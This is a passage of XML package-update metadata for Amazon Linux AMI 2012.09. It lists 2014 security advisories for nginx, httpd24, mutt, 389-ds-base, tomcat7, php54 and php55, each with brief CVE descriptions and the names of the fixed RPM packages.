arch="i686"><filename>Packages/libtiff-static-3.9.4-10.12.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-10.12.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="10.12.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-10.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-308</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-308: important priority package update for nginx</title><issued date="2014-03-24 23:32:00" /><updated date="2014-09-17 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0133:
1077988:
CVE-2014-0133 nginx: heap-based buffer overflow in SPDY implementation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0133" title="" id="CVE-2014-0133" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-debuginfo" version="1.4.7" release="1.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.4.7-1.17.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.4.7" release="1.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.4.7-1.17.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.4.7" release="1.17.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.4.7-1.17.amzn1.i686.rpm</filename></package><package name="nginx" version="1.4.7" release="1.17.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.4.7-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-309</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-309: medium priority package update for httpd24</title><issued date="2014-03-24 23:33:00" /><updated date="2014-09-17 22:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0098:
1077871:
CVE-2014-0098 httpd: mod_log_config does not properly handle logging certain cookies resulting in DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098" title="" id="CVE-2014-0098" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ldap" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.9" release="1.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.9" release="1.54.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.9-1.54.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.9" release="1.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.9" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.9-1.54.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.9" 
release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.9" release="1.54.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.9" release="1.54.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.9-1.54.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.9" release="1.54.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.9-1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-310</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-310: important priority package update for mutt</title><issued date="2014-03-24 23:33:00" /><updated date="2014-09-17 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0467:
A heap-based buffer overflow flaw was found in the way mutt processed certain email headers. A remote attacker could use this flaw to send an email with specially crafted headers that, when processed, could cause mutt to crash or, potentially, execute arbitrary code with the permissions of the user running mutt.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0467" title="" id="CVE-2014-0467" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0304.html" title="" id="RHSA-2014:0304" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mutt-debuginfo" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-debuginfo-1.5.20-4.20091214hg736b6a.7.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-1.5.20-4.20091214hg736b6a.7.amzn1.x86_64.rpm</filename></package><package name="mutt-debuginfo" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-debuginfo-1.5.20-4.20091214hg736b6a.7.amzn1.i686.rpm</filename></package><package name="mutt" version="1.5.20" release="4.20091214hg736b6a.7.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-1.5.20-4.20091214hg736b6a.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-311</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-311: important priority package update for 389-ds-base</title><issued date="2014-03-24 23:34:00" /><updated date="2014-09-17 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0132:
It was discovered that the 389 Directory Server did not properly handle certain SASL-based authentication mechanisms. A user able to authenticate to the directory using these SASL mechanisms could connect as any other directory user, including the administrative Directory Manager account. This could allow them to modify configuration values, as well as read and write any data the directory holds.
1074845:
CVE-2014-0132 389-ds: flaw in parsing authzid can lead to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0132" title="" id="CVE-2014-0132" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.2.16-1.16.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.2.16-1.16.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.2.16-1.16.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.2.16-1.16.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.16" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.2.16-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-312</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-312: medium priority package update for tomcat7</title><issued date="2014-03-24 
23:36:00" /><updated date="2014-09-17 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0050:
1062337:
CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050" title="" id="CVE-2014-0050" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-docs-webapp" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.47-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.47" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2014-313</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-313: medium priority package update for php54</title><issued date="2014-03-24 23:37:00" /><updated date="2014-09-17 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2270:
1072220:
CVE-2014-2270 file: out-of-bounds memory access when parsing Portable Executable (PE) format files
CVE-2014-1943:
Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file.
1065836:
CVE-2014-1943 file: unrestricted recursion in handling of indirect type rules
1065836:
CVE-2014-1943 file: infinite recursion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943" title="" id="CVE-2014-1943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270" title="" id="CVE-2014-2270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-dba" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.26" release="1.51.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-mbstring-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.26" 
release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.26" release="1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.26-1.51.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.26-1.51.amzn1.i686.rpm</filename></package><package 
name="php54-mysqlnd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.26-1.51.amzn1.i686.rpm</filename></package><package 
name="php54-odbc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-imap" 
version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.26-1.51.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.26" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.26-1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-314</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-314: important priority package update for php55</title><issued date="2014-03-24 23:37:00" /><updated date="2014-09-18 00:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2270:
1072220:
CVE-2014-2270 file: out-of-bounds memory access when parsing Portable Executable (PE) format files
CVE-2014-1943:
Fine Free file before 5.17 allows context-dependent attackers to cause a denial of service (infinite recursion, CPU consumption, and crash) via a crafted indirect offset value in the magic of a file.
1065836:
CVE-2014-1943 file: unrestricted recursion in handling of indirect type rules
1065836:
CVE-2014-1943 file: infinite recursion
CVE-2013-7327:
The gdImageCrop function in ext/gd/gd.c in PHP 5.5.x before 5.5.9 does not check return values, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via invalid imagecrop arguments that lead to use of a NULL pointer as a return value, a different vulnerability than CVE-2013-7226.
1065108:
CVE-2013-7226 CVE-2013-7327 CVE-2013-7328 CVE-2014-2020 php: multiple vulnerabilities in gdImageCrop()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7327" title="" id="CVE-2013-7327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943" title="" id="CVE-2014-1943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270" title="" id="CVE-2014-2270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-soap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.10" release="1.67.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-enchant-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package 
name="php55-common" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.10" release="1.67.amzn1" epoch="0" 